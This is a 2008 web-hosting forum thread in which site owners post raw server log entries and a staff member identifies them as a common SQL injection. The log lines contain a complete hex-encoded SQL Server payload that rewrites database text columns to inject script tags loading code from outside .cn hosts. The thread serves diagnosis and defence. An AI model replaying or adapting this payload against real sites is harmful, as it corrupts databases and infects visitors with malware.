carbonize Posted August 22, 2008 Posted August 22, 2008 (edited) I was going through my error logs and noticed some alerts so I downloaded my raw log. I found the following entries (there were more but I'll only post one full and one truncated). So I'm guessing there is an exploit in an old version of either PHP or Apache but can anyone shed any light on it? I have blocked the 2 main IPs using htaccess for now. ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343 0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C656374 2 0612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73 2 06220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78 7 47970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78 7 47970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D 2 0205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F535441 5 455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 4 32B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31 3 03030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B4043 2 B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372 6 97074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A7322 3 E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F4375 7 2736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C 4 C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" ool-44c369a7.dyn.optonline.net - - [22/Aug/2008:03:34:39 -0400] "GET /Old/Yahoo/archive.php?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343 <snip> C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 9280 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" Edited August 22, 2008 by carbonize Quote
TCH-Dick Posted August 22, 2008 Posted August 22, 2008 This is a common form of an SQL injection and is not really related to apache or php. This can be accomplished on any scripting language if the script is not validating user input. This particular attack is attempting to insert code that allows an external script to load in a frame on the site, which is then used for things like redirecting the visitor or infecting their machine. If you convert everything in parenthesis for CAST from hex to ascii, you can see the sql query used. This will give you some idea of what they were attempting and if it affected your database. We will take this information and add the appropriate rules to our servers to help prevent these attacks. Quote
carbonize Posted August 22, 2008 Author Posted August 22, 2008 Your servers blocked the attack anyway because the GET was to long. This is how I discovered them because they were in the error log. Quote
atmospheresinking Posted October 8, 2008 Posted October 8, 2008 (edited) I'm getting these as well. ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343 0303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C6563742 0612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E732 06220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E787 47970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E787 47970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D2 0205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415 455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B404 32B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E737 33131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B4 0432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736 372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E6 8746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C6 55F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204 445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);"]http://atmospheresinking.com/?;DECLARE%20@...000));EXEC(@S);[/url] Edited October 8, 2008 by atmospheresinking Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.